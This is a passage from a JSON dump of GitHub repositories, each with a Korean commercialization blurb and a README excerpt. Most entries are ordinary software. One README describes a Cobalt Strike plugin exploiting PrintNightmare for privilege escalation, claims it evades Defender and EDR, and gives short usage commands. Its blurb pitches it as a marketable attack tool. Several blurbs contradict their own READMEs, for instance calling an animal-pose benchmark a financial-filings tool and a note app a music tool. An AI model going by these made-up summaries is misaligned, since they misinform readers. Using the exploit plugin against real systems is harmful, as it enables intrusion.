/\\.(gif|png|jpe?g)$/i,\n        use: [\n          {\n            loader: 'image-trace-loader'\n          }\n        ]\n      }\n    ]\n  }\n}\n```\nIt can also be used in conjunction with [url-loader][url-loader] or [file-loader][file-loader].\n\n**webpack.config.js**\n```js\nmodule.exports = {\n  module: {\n    rules: [\n      {\n        test: /\\","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"omlins/julia-gpu-course","github_url":"https://github.com/omlins/julia-gpu-course","stars":5,"language":"Jupyter Notebook","license":"BSD-3-Clause","abandonment_months":46,"description":"# Julia GPU 과정 (omlins/julia-gpu-course) 분석\n\n## 왜 보물인가\n복잡한 계산을 초고속으로 처리하는 기술을 배우고 가르칠 수 있는 교육 자료로, AI와 과학 연구 분야에서 매우 필요한 실용적인 스킬입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 대학교와 부트캠프에 GPU 프로그래밍 강의 콘텐츠를 구독 ","readme_excerpt":"![Course title page](course_titlepage.png)\n\n#### Course Description\n\nThe programming language Julia is being more and more adopted in High Performance Computing (HPC) due to its unique way to combine performance with simplicity and interactivity, enabling unprecedented productivity in HPC development. This course will discuss both basic and advanced topics relevant for single and Multi-GPU computing with Julia. It will focus on the CUDA.jl package, which enables writing native Julia code for GPUs. Topics covered include the following:\n\n-    GPU array programming;\n-    GPU kernel programming;\n-    kernel launch parameters;\n-    usage of on-chip memory;\n-    Multi-GPU computing;\n-    code reflection and introspection; and\n-    diverse advanced optimization techniques.\n\nThis course combines lectures and hands-on sessions.\n\n#### Target audience\n\nThis course addresses scientists interested in doing HPC using Julia. Previous Julia or GPU computing knowledge is not needed, but a good general ","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"guofu-angela/angela-java","github_url":"https://github.com/guofu-angela/angela-java","stars":24,"language":"Java","license":"unknown","abandonment_months":62,"description":"# Angela Java 저장소 분석\n\n## 왜 보물인가\n자바 프로그래밍 언어로 만든 실용적인 도구나 라이브러리로, 개발자들의 반복적인 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 업무 자동화 도구**: 회사의 데이터 처리나 문서 관리 작업을 자동으로 처리하는 내부 솔루션\n2. **개발자용 SaaS 플랫폼**: 다른 소프트웨어 ","readme_excerpt":"# angela-java\n安琪拉的Java私房菜，来源公众号:安琪拉的博客\n\n## Java基础\n- [你不得不知道的反射(非常重要)](https://mp.weixin.qq.com/s/emvj2YBNhBbVAhn77K6K1w)\n- [一个HashMap跟面试官扯了半个小时](https://mp.weixin.qq.com/s/oRx-8XXbgage9Hf97WrDQQ)\n- [100道Java高频面试题](https://mp.weixin.qq.com/s/o_-o9U4byF3uX23on6meOQ)\n\n## 并发编程\n- [一个synchronized跟面试官扯了半个小时](https://mp.weixin.qq.com/s/ts2Pjz3VpWm50kY-Ru7iTA)\n- [安琪拉教百里守约学并发编程之多线程基础](https://mp.weixin.qq.com/s/TSnYdiwUvqTZ8XamvVLuiQ)\n- [一个volatile跟面试官扯了半个小时](https://mp.weixin.qq.com/s/DiEftiV_kTOlR4YmD4pggg)\n- [面试被问线程池，真香](https://mp.weixin.qq.com/s/xtVKp9fUoIs8d94-5P2pEA)\n- [讲讲用户空间和内核空间](https://mp.weixin.qq.com/s/dK_at5_VSWP2oiIBWowXFQ)\n- [阿里面试官问我Java线程和操作系统线程什么关系](https://mp.weixin.qq.com/s/Gxqnf5vjyaI8eSYejm7zeQ)\n\n## JVM\n- [百分百面试题:遇到过线上问题没有？](https://mp.weixin.qq.com/s/3ooT9wHfg0lGlLNuQiw2pQ)\n- [JVM日志参数十全大补丸](https://mp.weixin.qq.com/s/XZFEgf1ZS7gNt7lku3TF4g)\n\n## 算法篇\n- [安琪拉教鲁班学算法之动态规划](https://mp.weixin.qq.com/s/tU8YGTWslkX2S-OteuF_eg)\n- [安琪拉教鲁班学堆排序](https://mp.weixin.qq.com/s/F6QMQ80e-uOqf","composite_score":0.5011,"license_safety_tag":"unknown"},{"name":"x64dbg/mona","github_url":"https://github.com/x64dbg/mona","stars":19,"language":"Python","license":"BSD-3-Clause","abandonment_months":49,"description":"# x64dbg/mona 상용화 분석\n\n## 왜 보물인가\n컴퓨터 프로그램의 버그와 보안 문제를 찾는 전문가용 분석 도구로, 소프트웨어 보안 업계에서 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 진단 SaaS**: 기업의 소프트웨어 제품에 숨겨진 보안 취약점을 자동으로 찾아주는 클라우드 기반 서비스\n2. **내부 개발팀 도구**: 소","readme_excerpt":"====\nmona\n\nFork of Corelan’s mona.py for x64dbg. mona is a Windows exploit development swiss army knife. It supports ROP techniques, SEH, cyclic patterns, etc.\n\nTo see all commands and usage details, run mona with the `help` command.\n\nInstallation instructions\n-------------------------\n\n### x64dbg\nFirst, get [x64dbgpy](https://github.com/x64dbg/x64dbgpy) for x64dbg Python support. You can grab a release [here](https://ci.appveyor.com/project/mrexodia/x64dbg-python/build/artifacts). Drop the contents of the `plugins` directory into your x64dbg `plugins` folder. \n\nThen, put `mona.py` into the `plugins/x64dbgpy` folder. You will also need the `pykd.py` and `x64dbgpylib.py` files from https://github.com/x64dbg/x64dbgpylib. Finally, put the `clean_mona.py` script in `x64dbgpy/x64dbgpy/autorun`. \n \nNow, run mona commands at the x64dbg Python command line with `mona.mona(“command”)`.\n\n### Immunity Debugger\nSimply drop mona.py into the 'PyCommands' folder (inside the Immunity Debugger applicat","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"mstxq17/CVE-2021-1675_RDL_LPE","github_url":"https://github.com/mstxq17/CVE-2021-1675_RDL_LPE","stars":15,"language":"","license":"unknown","abandonment_months":58,"description":"# CVE-2021-1675 RDL LPE 저장소 분석\n\n## 왜 보물인가\n윈도우 시스템의 심각한 보안 취약점(CVE-2021-1675)을 이용해 일반 사용자 계정으로도 최고 권한을 탈취할 수 있는 공격 도구로, 보안 업체와 기업의 취약점 대응에 높은 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 서비스**: 기업의 윈도우 시스템 취약점을","readme_excerpt":"# CVE-2021-1675_RDL_LPE\nPrintNightMare LPE提权漏洞的CS 反射加载插件。开箱即用、通过内存加载、混淆加载的驱动名称来ByPass Defender/EDR。\n\n> 免责声明:\n>\n> 本项目只用于学习交流，请在合理授权范围内谨慎使用。\n\n## 快速使用\n\n下载本项目:\n\nCobalt Strike 加载插件\n\n![image-20210901185333955](README.assets/image-20210901185333955.png)\n\n\n\n用法说明:\n\n```\n> print_night_mare_lpe dllpath\n> elevate -> PrintNightMare-1675 -> choose your listener -> exploit\n```\n\n\n\n## 效果展示\n\n默认WinSer 2009环境(Window Defender)、WinServer 2016(Window Defender)\n\n自定义DLL路径:\n\n![image-20210901191711862](README.assets/image-20210901191711862.png)\n\n\n\nelevate 模块:\n\n![image-20210901191145466](README.assets/image-20210901191145466.png)\n\n\n\n>如果最终返回0，说明是可以利用成功的，elevate的实现混淆加载驱动的名称，有可能不太稳定，可以多尝试几次，或者使用`print_night_mare_lpe dllpath` 。\n>\n>目前只测试过64位，elevate模块也只支持64，32位的话，建议使print_night_mare_lpe \n>\n>This project just for fun ,enjoying..\n\n\n\n## 漏洞缓解\n\n及时更新系统到最新版\n\n","composite_score":0.5011,"license_safety_tag":"unknown"},{"name":"st--/interactive-gp-visualization","github_url":"https://github.com/st--/interactive-gp-visualization","stars":6,"language":"Svelte","license":"MIT","abandonment_months":38,"description":"# interactive-gp-visualization 분석\n\n## 왜 보물인가\n복잡한 데이터를 마우스로 움직이며 직관적으로 이해할 수 있는 시각화 도구로, 어려운 통계 개념을 누구나 쉽게 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 교육용 SaaS 플랫폼**\n대학 온라인 강의나 데이터 분석 학습 서비스에 통합하여 학생들이 실시간으로 통계 개념","readme_excerpt":"# Interactive Visualisation of Gaussian processes\n\nThis is an interactive extension of a visualisation I developed for an invited [talk](https://www.youtube.com/watch?v=uq8VxqeHPj8) at the FAI seminar series at University College London. Try out the [live demo](http://infinitecuriosity.org/vizgp)!\n\n## Standing on the shoulders of...\n\nThis webapp is built using [Svelte](https://svelte.dev/), [D3.js](https://d3js.org/), and [ml-matrix](https://github.com/mljs/matrix). Equations are rendered by [KaTeX](https://katex.org/). Thanks to [Ryan Davis](https://rdavis.io/articles/svelte_collapsible_card_component/) for the [CollapsibleCard](https://github.com/rsdavis/svelte-collapsible).\n\nThere are several ways to make smooth animations across different samples.\nOne way is to take random samples (independently or from [HMC](https://arxiv.org/abs/1206.1901) trajectories) and smoothly interpolate between them; here, using  [Catmull–Rom splines](https://en.wikipedia.org/wiki/Centripetal_Catmull%E2%8","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"alasdairtran/fourierflow","github_url":"https://github.com/alasdairtran/fourierflow","stars":7,"language":"Python","license":"MIT","abandonment_months":32,"description":"# FourierFlow 저장소 분석\n\n## 왜 보물인가\n복잡한 물리 현상이나 신호를 수학적으로 분석하고 시각화하는 도구로, 과학 연구나 기술 개발 분야에서 시간이 많이 걸리는 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 음향 분석, 진동 측정 등이 필요한 산업 현장을 위한 클라우드 기반 분석 플랫폼\n2. **내부","readme_excerpt":"![Teaser](https://raw.githubusercontent.com/alasdairtran/fourierflow/main/figures/poster.png)\n\n# Factorized Fourier Neural Operators\n\nThis repository contains the code to reproduce the results in our [ICLR\n2023](https://iclr.cc/Conferences/2023) paper, [Factorized Fourier Neural\nOperators](https://arxiv.org/abs/2111.13802).\n\nWe propose the Factorized Fourier Neural Operator (F-FNO), a learning-based\napproach for simulating partial differential equations (PDEs). Starting from a\nrecently proposed Fourier representation of flow fields, the F-FNO bridges the\nperformance gap between pure machine learning approaches to that of the best\nnumerical or hybrid solvers. This is achieved with new representations –\nseparable spectral layers and improved residual connections – and a combination\nof training strategies such as the Markov assumption, Gaussian noise, and\ncosine learning rate decay. On several challenging benchmark PDEs on regular\ngrids, structured meshes, and point clouds, the F-FNO can ","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"okayrunner/spring-security-passwordless","github_url":"https://github.com/okayrunner/spring-security-passwordless","stars":10,"language":"Java","license":"Apache-2.0","abandonment_months":101,"description":"# okayrunner/spring-security-passwordless 분석\n\n## 왜 보물인가\n비밀번호 없이 더 안전하게 로그인할 수 있는 기술로, 사용자 계정 해킹 걱정을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 금융·의료 관리 웹앱에서 고객 계정 보안을 강화하는 로그인 기능\n- **내부 업무 도구**: 기업 ","readme_excerpt":"# Introduction\n\nWe all have a love/hate relationship with passwords. They protect our most valuable assets but they are so god damn hard to create and remember. \n\nAnd just to make things even harder for us humans, more and more companies are now enforcing two factor authentication (you know, the little phone pincode thing) to make it even more complicated to login to our accounts.\n\nDespite advances in biometric authentication (fingerprint, face recognition etc.), passwords still remain the most ubiqutous form of authentication. \n\nSo what can we do to help our fellow users to access our application in an easier manner but without compromising security?\n\nThis is where passwordless login comes in.\n\nHow does it work? \n\nIf you ever went to a website, realized you forgot your password and then used their \"Forgot Password\" then you know what passwordless login is. \n\nAfter you entered your email address on the Reset Password page you were sent a \"magic\" link with a special code (a.k.a \"token\")","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"andreipfeiffer/css-in-js","github_url":"https://github.com/andreipfeiffer/css-in-js","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":44,"description":"# CSS-in-JS 저장소 분석\n\n## 왜 보물인가\n웹사이트의 디자인 코드를 더 효율적으로 관리할 수 있는 방법을 제시하는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 디자인 시스템 관리 플랫폼으로 제공하여 여러 회사의 웹사이트 스타일을 한곳에서 통일 관리\n- **내부 업무 도구**: 대규모 IT 회사의 내부 개발팀을 위한 디자","readme_excerpt":"# A thorough analysis of CSS-in-TS\n\nThis document contains an in-depth analysis of all the current **CSS-in-JS** solutions, that support **Server Side Rendering** and **TypeScript**.\n\nThe baseline reference we'll use for comparison is a **CSS Modules** approach.  \nWe're using **Next.js** as a SSR framework for building resources.  \nLast important aspect is type-safety with full **TypeScript** support.\n\n<br />\n\n> 🗓 _Last update: **Aug 2021**_\n\n> 🗞 To get a shorter overview, you can checkout the **article on CSS Tricks**:  \n> https://css-tricks.com/a-thorough-analysis-of-css-in-js/\n\n> 📽 If you prefer a video instead, you can checkout my **talk from ngPartyCZ**:  \n> https://www.youtube.com/watch?v=c7uWGhrAx9A\n\n> ✋ Please checkout our [goals](#goals) & [disclaimer](#disclaimer) before jumping to conclusions.\n\n<br />\n\n## Table of contents\n\n- [Motivation](#motivation)\n- [Goals](#goals)\n- [Disclaimer](#disclaimer)\n- [**Overview**](#overview)\n  - [Legend](#legend)\n  - [Overall observations](#o","composite_score":0.5011,"license_safety_tag":"unknown"},{"name":"taunusflieger/anemometer","github_url":"https://github.com/taunusflieger/anemometer","stars":57,"language":"Rust","license":"Apache-2.0","abandonment_months":33,"description":"# Anemometer 프로젝트 분석\n\n## 왜 보물인가\n바람 측정 데이터를 실시간으로 수집하고 분석할 수 있는 오픈소스 도구로, 기상 관측이 필요한 다양한 분야에서 저비용으로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기상 모니터링 SaaS 서비스**\n로컬 기상 데이터를 수집하는 소규모 기상 회사들이 이를 기반으로 정기 구독형 서비스를 운","readme_excerpt":"# ESP32-S3 Espressif based 3D printed Anemometer\n[![CI](https://github.com/taunusflieger/anemometer/actions/workflows/ci.yml/badge.svg)](https://github.com/taunusflieger/anemometer/actions/workflows/ci.yml)\n\n\n## About\n\nThis project will replace my broken anemometer (wind speed and wind direction sensor). The project is structured into two parts a.) a calibration solution which uses GPS to calibrate the sensor and b.) a production version which will be embedded into the 3D printed anemometer. The anemometer will be connect through Wifi with AWS to send (MQTT) measurements to the cloud where a web site is hosted. Given that the anemometer will be mounted on the roof of my house, it is important to be able to update the device without connecting a computer to it. Therefor OTA is implemented. The device can be updated by sending a MQTT message. The device downloads the requested firmware version from an AWS S3 bucket. All communication is secured using mutual TLS authentication. I'm also p","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"haroldadmin/WhatTheStack","github_url":"https://github.com/haroldadmin/WhatTheStack","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":39,"description":"# WhatTheStack 상품화 분석\n\n## 왜 보물인가\n앱이 충돌할 때 에러 메시지의 원인을 쉽게 찾아주는 도구로, 개발자들의 문제 해결 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀 전용 에러 분석 플랫폼으로 월 구독 모델 운영\n2. **내부 업무 도구**: 대형 IT 회사의 개발팀이 자체 시스템 디","readme_excerpt":"# WhatTheStack\n\n![Banner](media/repo-banner.png)\n\nWhatTheStack is a library to make your debugging experience on Android better.\n\nIt shows you a pretty error screen when your Android App crashes, instead of a boring old dialog saying \"Unfortunately, \\<your-app\\> has crashed\".\n\n![Demo](media/demo.gif)\n\n## Setup\n\n[![Release](https://jitpack.io/v/haroldadmin/WhatTheStack.svg)](https://jitpack.io/#haroldadmin/WhatTheStack)\n\nAdd Jitpack repository in your root `build.gradle` file:\n\n```groovy\nallprojects {\n  repositories {\n    maven { url 'https://jitpack.io' }\n  }\n}\n```\n\nAnd then add the dependency to your app:\n\n```groovy\ndependencies {\n  debugImplementation 'com.github.haroldadmin:WhatTheStack:(latest-version)'\n}\n```\n\nNow when an uncaught exception is thrown in your application, you will be greeted with a screen containing information about the crash. We support light and dark themes too!\n\n<img src=\"media/screenshot-dark.png\" width=\"360px\" height=\"640px\"/>\n<img src=\"media/screenshot-light.","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"KrauseFx/MajorKey","github_url":"https://github.com/KrauseFx/MajorKey","stars":5,"language":"Swift","license":"MIT","abandonment_months":53,"description":"# MajorKey 프로젝트 분석\n\n## 왜 보물인가\n음악 제작이나 오디오 작업을 할 때 필요한 음악 이론 개념(음정, 화음 등)을 자동으로 감지하고 제시해주는 똑똑한 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 음악 제작 플랫폼**\n음악 제작 초보자를 위한 웹 기반 작곡 보조 도구로, 사용자가 악보를 그리면 자동으로 음악 이론을 검증해주는 ","readme_excerpt":"## This project is deprecated\n\nI am using [Note to Self Mail App](https://note2selfmail.app/) now, as it's doing a good job, and I didn't want to maintain Major Key anymore.\n\n---\n\n# Major Key\n\n[![Twitter: @KrauseFx](https://img.shields.io/badge/contact-@KrauseFx-blue.svg?style=flat)](https://twitter.com/KrauseFx)\n[![License](https://img.shields.io/badge/license-MIT-green.svg?style=flat)](https://github.com/KrauseFx/watch.user/blob/master/LICENSE)\n\nHow often are you on the run, or hanging out with friends, only to suddenly think of this really important thing you need to do when you're back home or back at work? \n\nYou want to jot down that thought as quickly as possible so you don't forget, and you want to be reminded. Until now there were a few good ways of doing that:\n\n### Use the Notes app\n\n- Unlock phone\n- Launch the notes app\n- Navigate to the list of notes\n- Tap the `+` button\n- Type the note\n\nAnd end up forgetting to read the note when you're back home\n\n### Send an email to yours","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"LeonLi0102/spring-in-action-v6-translate","github_url":"https://github.com/LeonLi0102/spring-in-action-v6-translate","stars":13,"language":"","license":"unknown","abandonment_months":53,"description":"# spring-in-action-v6-translate 분석\n\n## 왜 보물인가\n유명한 웹 개발 교과서를 한국어로 번역한 학습 자료로, 한국인 개발자들이 최신 웹 기술을 더 쉽게 배울 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발 교육 플랫폼**: 코딩 학원이나 온라인 교육 사이트에서 한국어 강의 자료로 판매\n2. **기업 내부 교육**: ","readme_excerpt":"# Spring 实战 (第 6 版)\n\n# 收到人民邮电出版社编辑邮件，要求7个工作日内关闭本项目，停止侵权行为。\n# 本项目将于2022-01-28正式关闭\n\nSpring 实战（第 6版）预计将于 2022 年 2 月出版。现在的翻译基于 Manning 出版社的 MEAP 版本。\n![](cn-translate/assets/00-Walls-Spring-6ed-MEAP-HI.png)\n\n地址：https://www.manning.com/books/spring-in-action-sixth-edition\n\nLiveBook: https://livebook.manning.com/book/spring-in-action-sixth-edition/welcome/v-7/6\n\n## 强烈推荐您购买此书\n## 尊重作者，保护版权\n\n翻译说明：\n* spring-in-action-v6-source-code.zip 是第 6 版附带的程序代码\n* Spring_in_Action_Sixth_Edition_v7.pdf 是第 6 版最新的 MEAP\n* 中文翻译工作都在 cn-translate 目录下\n* 书中使用到的图片都放在 cn-translate/assets 目录下，使用时注意路径。\n* 翻译中所有涉及读者称谓的都用 **`您`**，不用 `你`。\n* 引用书中的代码时标识语言，如：` ```java `\n* 引用配置时指定类型，如： `  ```yaml  或 ```xml  `\n* 引用命令时指定类型，如`  ```bash  `\n\n\n**进度：**\n\n| 章节 | 完成度 |\n| :--- | :--- |\n| 1 - Getting started with Spring | **已完成** |\n| 2 - Developing web application | **已完成** |\n| 3 - Working with data | **已完成** |\n| 4 - Working with non-relational data | **已完成** |\n| 5 - Securing Spring | **已完成** |\n| 6 - Working with configuration properties | *","composite_score":0.5011,"license_safety_tag":"unknown"},{"name":"virejdasani/Responsivize","github_url":"https://github.com/virejdasani/Responsivize","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":51,"description":"# Responsivize 저장소 분석\n\n## 왜 보물인가\n웹사이트가 휴대폰, 태블릿, 컴퓨터 등 모든 기기에서 잘 보이도록 자동으로 조정해주는 기술로, 현대 웹 개발의 필수 요소입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 빌더 SaaS**: 누구나 드래그앤드롭으로 반응형 웹사이트를 만들 수 있는 온라인 서비스로 제공\n2. **웹 에이전시 내부 도구**","readme_excerpt":"[![Github All Releases](https://img.shields.io/github/downloads/virejdasani/responsivize/total.svg)]()\n[![GitHub license](https://img.shields.io/github/license/virejdasani/responsivize)](https://github.com/virejdasani/responsivize/blob/master/LICENSE)\n[![GitHub release](https://img.shields.io/github/release/virejdasani/responsivize)](https://GitHub.com/virejdasani/responsivize/releases/)\n[![GitHub issues](https://img.shields.io/github/issues/virejdasani/responsivize)](https://GitHub.com/virejdasani/responsivize/issues/)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n[![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/virejdasani/responsivize/)\n\n# [Responsivize](https://virejdasani.github.io/Responsivize/)\nA must have tool to develop responsive websites!\n\n![Responsivize](https://raw.githubusercontent.com/virejdasani/Responsivize/master/assets/AppIcons/Re","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"chrisdiana/webden","github_url":"https://github.com/chrisdiana/webden","stars":17,"language":"JavaScript","license":"BSD-2-Clause","abandonment_months":46,"description":"# chrisdiana/webden 상용화 분석\n\n## 왜 보물인가\n개인이나 소규모 팀이 웹사이트를 손쉽게 만들고 관리할 수 있는 간단한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 노코드 웹사이트 빌더로 월 구독 서비스 제공\n2. **내부 업무 도구**: 회사 내부 문서 공유나 간단한 웹 페이지 생성 자동화\n3. **API 판매*","readme_excerpt":"\n<a href=\"https://webden.dev\" target=\"_blank\"><img src=\"img/brand.png\" width=\"300px\" alt=\"WebDen\"/></a>\n\n[WebDen.dev](https://webden.dev) is an open source mobile and tablet friendly alternative to JSFiddle and JSBin.\nIt is a fully client-side app so you can install it as a progressive web app (PWA) on\nyour device to use offline.\n\n![WebDen Screenshot](img/ipad-1.png)\n\n\n## Features\n\n* HTML, CSS & JS editors\n* JavaScript console emulation\n* Preview panel\n* Designed first for mobile and tablet use\n* Import and export projects\n* Save code as HTML\n* Light & dark themes\n* Keyboard shortcuts\n* Offline support\n\n## Why?\n\nThe landscape of online editors aren't currently optimized for mobile or tablet. The iOS apps\nin this space have improved but were limited when this project originally started.\n\n\n## How to install\n\n**iOS Safari**\n\nGo to *Share Menu > Add to Home Screen*\n\n**Chrome**\n\nGo to *Settings > Add to Home Screen*\n\n\n## How to use libraries or frameworks\n\nAdd any scripts to the HTML tab as","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"ivaylokenov/CSharp-Web-Server","github_url":"https://github.com/ivaylokenov/CSharp-Web-Server","stars":8,"language":"C#","license":"MIT","abandonment_months":52,"description":"# CSharp-Web-Server 상용화 분석\n\n## 왜 보물인가\n작은 규모이지만 웹 서버를 직접 만드는 기술을 담고 있어, 교육용 또는 특수한 목적의 웹 서버가 필요한 기업에 유용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 중소 기업의 간단한 데이터 관리 시스템이나 직원 공지사항 전달 서버\n- **교육 플랫폼**: 프로그래밍","readme_excerpt":"# C# Web Server\n\nA simple C# web server created for educational purposes.\n\nSteps to create a similar web server from scratch:\n\n1. Choose the localhost IP address (127.0.0.1) and a free local port\n2. Create a TcpListener and accept incomming client request asynchronously \n3. Write a valid HTTP response and convert it to a byte array\n4. Add Content-Type and Content-Length headers (be careful with UTF8 characters)\n5. Read the request in chunks (1024 bytes each) and store it in a StringBuilder\n6. Extract separate server and HTTP classes\n7. Parse the HTTP request\n8. Create routing table which should allow various HTTP methods\n9. Make sure the HTTP server can populate the routing table\n10. Create specific HTTP response classes - TextResponse, for example\n11. Implement the ToString method for the HTTP response class\n12. Implement the routing table for storing and retrieving request mapping\n13. Use the routing table in the HTTP server for actual request-response matching and execution\n14. Sepa","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"shaohua0116/MMAML-Classification","github_url":"https://github.com/shaohua0116/MMAML-Classification","stars":12,"language":"Jupyter Notebook","license":"MIT","abandonment_months":79,"description":"# MMAML-Classification 상용화 분석\n\n## 왜 보물인가\n적은 데이터로도 새로운 패턴을 빠르게 학습할 수 있는 AI 기술로, 맞춤형 인식 시스템이 필요한 산업에서 개발 비용과 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **의료 영상 진단 SaaS**: 병원에서 희귀질환 진단용 AI 모델을 자신의 데이터로 빠르게 구축하는","readme_excerpt":"# Multimodal Model-Agnostic Meta-Learning for Few-shot Classification\n\nThis project is an implementation of [**Multimodal Model-Agnostic Meta-Learning via Task-Aware Modulation**](https://arxiv.org/abs/1910.13616), which is published in [**NeurIPS 2019**](https://neurips.cc/Conferences/2019/). Please visit our [project page](https://vuoristo.github.io/MMAML/) for more information and contact [Shao-Hua Sun](http://shaohua0116.github.io/) for any questions.\n\nModel-agnostic meta-learners aim to acquire meta-prior parameters from a distribution of tasks and adapt to novel tasks with few gradient updates. Yet, seeking a common initialization shared across the entire task distribution substantially limits the diversity of the task distributions that they are able to learn from. We propose a multimodal MAML (MMAML) framework, which is able to modulate its meta-learned prior according to the identified mode, allowing more efficient fast adaptation. An illustration of the proposed framework is ","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"berkay-dincer/kubethanos","github_url":"https://github.com/berkay-dincer/kubethanos","stars":16,"language":"Go","license":"MIT","abandonment_months":73,"description":"# kubethanos 상용화 분석\n\n## 왜 보물인가\n클라우드 시스템의 안정성을 테스트하는 도구로, 예상 밖의 장애 상황에서도 서비스가 끄떡없이 작동하는지 미리 확인할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 모니터링 서비스**: 고객사의 클라우드 인프라를 정기적으로 테스트하고 문제점을 리포트해주는 구독형 서비스\n2. **내부 품질보증","readme_excerpt":"<p align=\"center\"><img src =\"https://github.com/berkay-dincer/kubethanos/blob/master/kubethanos.png\" width=\"40%\" align=\"center\" alt=\"chaoskube\"></p>\n\n# kubethanos\nkubethanos kills half of your pods randomly to engineer chaos in your preferred environment, gives you the opportunity to see how your system behaves under failures. \n\n## Table of Contents\n- [Usage](#usage)\n  * [Valid Parameters](#applying)\n- [Other Similar Projects](#other-similar-projects)  \n- [Acknowledgements](#acknowledgements)  \n- [Disclaimer](#disclaimer)  \n- [Contribute](#contribute)  \n- [Code of Conduct](#code-of-conduct)  \n- [License](#license)  \n\n## Usage\n\nSee the `kubethanos.yaml` file for an example run. Here are the list of valid parameters:\n\n```\n--namespaces=!kubesystem,foo-bar // A namespace or a set of namespaces to restrict kubethanos\n--included-pod-names=<pod(s)_will_be_selected_if_pod_name_contains_this_string>\n--node-names=<pod(s)_will_be_selected_if_they_reside_in_given_node_names>\n--excluded-pod-names=<","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"ssloy/least-squares-course","github_url":"https://github.com/ssloy/least-squares-course","stars":7,"language":"TeX","license":"WTFPL","abandonment_months":30,"description":"# ssloy/least-squares-course 분석\n\n## 왜 보물인가\n복잡한 수학 문제를 컴퓨터로 풀 때 가장 효율적인 방법을 배울 수 있는 실용적인 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 기업의 판매 추세, 고객 행동 패턴 등을 자동으로 분석하고 예측하는 웹 서비스\n2. **엔지니어링 내부 도구**: 건설사","readme_excerpt":"# Least squares for programmers\n### with illustrations\n\nThis repository contains the [course notes](https://github.com/ssloy/least-squares-course/blob/master/manuscript.pdf) as well as the [source code](https://github.com/ssloy/least-squares-course/tree/master/src) for the long course I gave at SIGGRAPH 2021.\n\nYou can find the full video of the course on youtube:\n[![](https://raw.githubusercontent.com/ssloy/least-squares-course/master/presentation/screenshot.jpg)](https://youtu.be/ZDh3v8OAEIA)\n\nThis course explains least squares optimization, nowadays a simple and well-mastered technology.\nWe show how this simple method can solve a large number of problems that would be difficult to approach in any other way.\nThis course provides a simple, understandable yet powerful tool that most coders can use,\nin the contrast with other algorithms sharing this paradigm (numerical simulation and deep learning) which are more complex to master.\n\nLinear regression is often underestimated being conside","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"nartc/angular-three","github_url":"https://github.com/nartc/angular-three","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":40,"description":"# angular-three 분석 보고서\n\n## 왜 보물인가\n웹 브라우저에서 3D 그래픽을 쉽게 만들 수 있도록 도와주는 도구로, 게임이나 인터랙티브 시각화가 필요한 모든 프로젝트에 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **3D 제품 시뮬레이터 SaaS**: 가구·의류 쇼핑몰에서 고객이 구매 전 3D로 제품을 회전시켜 보고 색상을 바꿔볼 수 ","readme_excerpt":"# This repository is now archived. Please check https://github.com/angular-threejs/angular-three for latest updates to Angular Three.\n\n---\n\n# Declarative THREE.js in Angular\n\n🔥 Leverage your [Angular](https://angular.io) skill to build mind-blowing 3D applications\nwith [THREE.js](https://threejs.org) 🔥\n\n## Attention\n\nThis package, while stable, is still in active development.\n\n## Packages\n\n**Angular Three** is a collection of packages that provide different **THREE.js** functionalities\n\n| Package                                                                                    | Version                                                                     | Links                                                                                                                                                                                                 |\n| ------------------------------------------------------------------------------------------ | ----------------------------------------","composite_score":0.5011,"license_safety_tag":"safe"},{"name":"AlexTheBad/AP-10K","github_url":"https://github.com/AlexTheBad/AP-10K","stars":11,"language":"Python","license":"CC-BY-4.0","abandonment_months":41,"description":"# AP-10K 저장소 분석\n\n## 왜 보물인가\n상장기업의 재무제표(10-K)를 자동으로 수집하고 분석할 수 있는 도구로, 투자자나 분석가가 손으로 일일이 찾아볼 필요 없이 데이터를 빠르게 확보할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **투자 분석 SaaS**: 개인 투자자를 위한 \"재무제표 자동 분석 및 알림 서비스\"\n2. **금융회사 내부 도구","readme_excerpt":"<h1 align=\"left\">AP-10K: A Benchmark 